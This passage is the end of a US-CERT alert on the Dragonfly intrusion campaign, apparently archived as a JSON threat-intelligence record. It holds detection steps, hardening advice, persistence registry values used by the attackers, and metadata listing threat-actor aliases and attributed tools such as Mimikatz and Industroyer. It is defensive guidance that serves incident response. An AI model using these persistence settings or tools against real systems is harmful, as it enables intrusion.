for\r\nattachment filenames and hashes found in the IOC packages.\r\nDetect persistence in VDI environments by searching file shares containing user profiles for all .lnk files.\r\nDetect evasion techniques by the threat actors by identifying deleted logs. 
This can be done by reviewing last-seen\r\nentries and by searching for event 104 on Windows system logs.\r\nDetect persistence by reviewing all administrator accounts on systems to identify unauthorized accounts, especially\r\nthose created recently.\r\nDetect the malicious use of legitimate credentials by reviewing the access times of remotely accessible systems for\r\nall users. Any unusual login times should be reviewed by the account owners.\r\nDetect the malicious use of legitimate credentials by validating all remote desktop and VPN sessions of any user’s\r\ncredentials suspected to be compromised.\r\nDetect spear-phishing by searching OWA logs for all IP addresses listed in the IOC packages.\r\nDetect spear-phishing through a network by validating all new email accounts created on mail servers, especially\r\nthose with external user access.\r\nDetect persistence on servers by searching system logs for all filenames listed in the IOC packages.\r\nDetect lateral movement and privilege escalation by searching PowerShell logs for all filenames ending in “.ps1”\r\ncontained in the IOC packages. (Note: requires PowerShell version 5, and PowerShell logging must be enabled prior\r\nto the activity.)\r\nDetect persistence by reviewing all installed applications on critical systems for unauthorized applications,\r\nspecifically note FortiClient VPN and Python 2.7.\r\nDetect persistence by searching for the value of “REG_DWORD 100” at registry location\r\n“HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\MaxInstanceCount” and the value of\r\n“REG_DWORD 1” at location\r\n“HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\dontdisplaylastusername”.\r\nDetect installation by searching all proxy logs for downloads from URIs without domain names.\r\nGeneral Best Practices Applicable to this Campaign:\r\nPrevent external communication of all versions of SMB and related protocols at the network boundary by blocking\r\nTCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best\r\nPractices for more information.\r\nBlock the Web-based Distributed Authoring and Versioning (WebDAV) protocol on border gateway devices on the\r\nnetwork.\r\nMonitor VPN logs for abnormal activity (e.g., off-hour logins, unauthorized IP address logins, and multiple\r\nconcurrent logins).\r\nDeploy web and email filters on the network. Configure these devices to scan for known bad domain names, sources,\r\nand addresses; block these before receiving and downloading messages. This action will help to reduce the attack\r\nsurface at the network’s first level of defense. Scan all emails, attachments, and downloads (both on the host and at\r\nthe mail gateway) with a reputable anti-virus solution that includes cloud reputation services.\r\nSegment any critical networks or control systems from business systems and networks according to industry best\r\npractices.\r\nEnsure adequate logging and visibility on ingress and egress points.\r\nEnsure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide\r\nadequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging,\r\nscript block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and\r\nanalysis. 
See the FireEye blog post Greater Visibility through PowerShell Logging for more information.\r\nImplement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A –\r\nCompromised Web Servers and Web Shells – Threat Awareness and Guidance.\r\nEstablish a training mechanism to inform end users on proper email and web usage, highlighting current information\r\nand analysis, and including common indicators of phishing. End users should have clear instructions on how to report\r\nunusual or suspicious emails.\r\nImplement application directory whitelisting. System administrators may implement application or application\r\ndirectory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults\r\nallow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software\r\nfolders. All other locations should be disallowed unless an exception is granted.\r\nBlock RDP connections originating from untrusted external addresses unless an exception exists; routinely review\r\nexceptions for validity.\r\nStore system logs of mission critical systems for at least one year within a security information event management\r\ntool.\r\nEnsure applications are configured to log the proper level of detail for an incident response investigation.\r\nConsider implementing HIPS or other controls to prevent unauthorized code execution.\r\nEstablish least-privilege controls.\r\nReduce the number of Active Directory domain and enterprise administrator accounts.\r\nBased on the suspected level of compromise, reset all user, administrator, and service account credentials across all\r\nlocal and domain systems.\r\nEstablish a password policy to require complex passwords for all users.\r\nEnsure that accounts for network administration do not have external connectivity.\r\nEnsure that network administrators use non-privileged accounts for email and Internet access.\r\nUse 
two-factor authentication for all authentication, with special emphasis on any external-facing interfaces and\r\nhigh-risk environments (e.g., remote access, privileged access, and access to sensitive data).\r\nImplement a process for logging and auditing activities conducted by privileged accounts.\r\nEnable logging and alerting on privilege escalations and role changes.\r\nPeriodically conduct searches of publicly available information to ensure no sensitive information has been\r\ndisclosed. Review photographs and documents for sensitive data that may have inadvertently been included.\r\nAssign sufficient personnel to review logs, including records of alerts.\r\nComplete independent security (as opposed to compliance) risk review.\r\nCreate and participate in information sharing programs.\r\nCreate and maintain network and system documentation to aid in timely incident response. Documentation should\r\ninclude network diagrams, asset owners, type of asset, and an incident response plan.\r\nReport Notice\r\nDHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to\r\nDHS or law enforcement immediately. To request incident response resources or technical assistance, contact CISA Central\r\nat contact@mail.cisa.dhs.gov or 1-844-Say-CISA.\r\nReferences\r\n[2] Symantec. Dragonfly: Western energy sector targeted by sophisticated attack group. September 6, 2017.\r\n[5] MIFR-10127623\r\nRevisions\r\nOctober 20, 2017: Initial version\r\nMarch 15, 2018: Updated to provide guidance that this alert has been superseded by newer\r\ninformation.\r\nSource: https://www.us-cert.gov/ncas/alerts/TA17-293A",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.us-cert.gov/ncas/alerts/TA17-293A"
	],
	"report_names": [
		"TA17-293A"
	],
	"threat_actors": [
		{
			"id": "649b5b3e-b16e-44db-91bc-ae80b825050e",
			"created_at": "2022-10-25T15:50:23.290412Z",
			"updated_at": "2026-04-10T02:00:05.257022Z",
			"deleted_at": null,
			"main_name": "Dragonfly",
			"aliases": [
				"TEMP.Isotope",
				"DYMALLOY",
				"Berserk Bear",
				"TG-4192",
				"Crouching Yeti",
				"IRON LIBERTY",
				"Energetic Bear",
				"Ghost Blizzard"
			],
			"source_name": "MITRE:Dragonfly",
			"tools": [
				"MCMD",
				"Impacket",
				"CrackMapExec",
				"Backdoor.Oldrea",
				"Mimikatz",
				"PsExec",
				"Trojan.Karagany",
				"netsh"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "90307967-d5eb-4b7b-b8de-6fa2089a176e",
			"created_at": "2022-10-25T15:50:23.501119Z",
			"updated_at": "2026-04-10T02:00:05.347826Z",
			"deleted_at": null,
			"main_name": "Dragonfly 2.0",
			"aliases": [
				"Dragonfly 2.0",
				"IRON LIBERTY",
				"DYMALLOY",
				"Berserk Bear"
			],
			"source_name": "MITRE:Dragonfly 2.0",
			"tools": [
				"netsh",
				"Impacket",
				"MCMD",
				"CrackMapExec",
				"Trojan.Karagany",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1a76ed30-4daf-4817-98ae-87c667364464",
			"created_at": "2022-10-25T16:47:55.891029Z",
			"updated_at": "2026-04-10T02:00:03.646466Z",
			"deleted_at": null,
			"main_name": "IRON LIBERTY",
			"aliases": [
				"ALLANITE ",
				"ATK6 ",
				"BROMINE ",
				"CASTLE ",
				"Crouching Yeti ",
				"DYMALLOY ",
				"Dragonfly ",
				"Energetic Bear / Berserk Bear ",
				"Ghost Blizzard ",
				"TEMP.Isotope ",
				"TG-4192 "
			],
			"source_name": "Secureworks:IRON LIBERTY",
			"tools": [
				"ClientX",
				"Ddex Loader",
				"Havex",
				"Karagany",
				"Loek",
				"MCMD",
				"Sysmain",
				"xfrost"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e2a4bc0b-6745-4e55-9d7c-3d169d70b025",
			"created_at": "2022-10-25T16:07:23.386907Z",
			"updated_at": "2026-04-10T02:00:04.576815Z",
			"deleted_at": null,
			"main_name": "Berserk Bear",
			"aliases": [
				"Berserk Bear",
				"Dragonfly 2.0",
				"Dymalloy",
				"G0074"
			],
			"source_name": "ETDA:Berserk Bear",
			"tools": [
				"Fuerboos",
				"Goodor",
				"Impacket",
				"Karagany",
				"Karagny",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Phishery",
				"Trojan.Karagany",
				"Trojan.Phisherly",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439095,
	"ts_updated_at": 1775792184,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f3426320cabc355f756fd039f450b88f535b5e6f.pdf",
		"text": "https://archive.orkl.eu/f3426320cabc355f756fd039f450b88f535b5e6f.txt",
		"img": "https://archive.orkl.eu/f3426320cabc355f756fd039f450b88f535b5e6f.jpg"
	}
}